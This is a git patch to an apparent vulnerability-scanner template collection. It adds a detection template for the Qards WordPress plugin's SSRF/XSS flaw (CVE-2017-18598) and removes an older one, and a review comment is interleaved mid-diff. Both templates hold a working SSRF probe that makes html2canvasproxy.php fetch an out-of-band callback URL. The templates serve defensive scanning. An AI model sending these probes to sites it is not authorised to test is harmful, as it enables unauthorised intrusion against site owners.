From fd7ac70096523c99c24c34f440a3ceaea75585df Mon Sep 17 00:00:00 2001
From: sandeep
Date: Sun, 27 Feb 2022 16:25:03 +0530
Subject: [PATCH] misc updates
---
cves/2017/CVE-2017-18598.yaml | 29 +++++++++++++++++++++++
vulnerabilities/wordpress/qards-ssrf.yaml | 17 -------------
2 files changed, 29 insertions(+), 17 deletions(-)
create mode 100644 cves/2017/CVE-2017-18598.yaml
delete mode 100644 vulnerabilities/wordpress/qards-ssrf.yaml
diff --git a/cves/2017/CVE-2017-18598.yaml b/cves/2017/CVE-2017-18598.yaml
new file mode 100644
index 0000000000..8506fa3956
--- /dev/null
+++ b/cves/2017/CVE-2017-18598.yaml
@@ -0,0 +1,29 @@
+id: CVE-2017-18598
+
+info:
+ name: Qards Plugin - Stored XSS and SSRF
+ author: pussycat0x
+ severity: medium
+ description: The Qards plugin through 2017-10-11 for WordPress has XSS via a remote document specified in the url parameter to html2canvasproxy.php
+ reference:
+ - https://wpscan.com/vulnerability/8934
+ - https://wpscan.com/vulnerability/454a0ce3-ecfe-47fc-a282-5caa51370645
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-18598
+ tags: cve,cve2017,wordpress,ssrf,xss,wp-plugin,oast
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "http"
+
+ - type: word
+ part: body
+ words:
+ - "console.log"
\ No newline at end of file
diff --git a/vulnerabilities/wordpress/qards-ssrf.yaml b/vulnerabilities/wordpress/qards-ssrf.yaml
deleted file mode 100644
index 4518dad447..0000000000
--- /dev/null
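Review bot: The `info` block in the new cves/2017/CVE-2017-18598.yaml describes only the XSS, while the request and the `interactsh_protocol` matcher confirm an outbound HTTP fetch made by `html2canvasproxy.php`, so a hit demonstrates the SSRF half of the name and not script execution. State that in the description, for example by appending `This template confirms the server-side fetch through an out-of-band HTTP interaction; it does not verify the XSS.`, so triage does not overstate the finding. The second matcher's `"console.log"` is a generic word; a comment such as `# marker expected in the proxy's response body - confirm against a known-vulnerable install` would record why it is required under `matchers-condition: and`, since a vulnerable response lacking that marker would presumably be missed. The file also ends without a trailing newline.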
@@ -1,17 +0,0 @@
-id: qards-ssrf
-info:
- name: Qards - Server Side Request Forgery
- author: pussycat0x
- severity: medium
- description: Qards provides you easy option to drag and edit every part and element of your site in the front-end, you will never have to write any code to change the layout or to change any part of the site like the traditional WordPress way.
- reference: https://wpscan.com/vulnerability/454a0ce3-ecfe-47fc-a282-5caa51370645
- tags: wordpress,ssrf
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}/'
- matchers:
- - type: word
- part: interactsh_protocol
- words:
- - "http"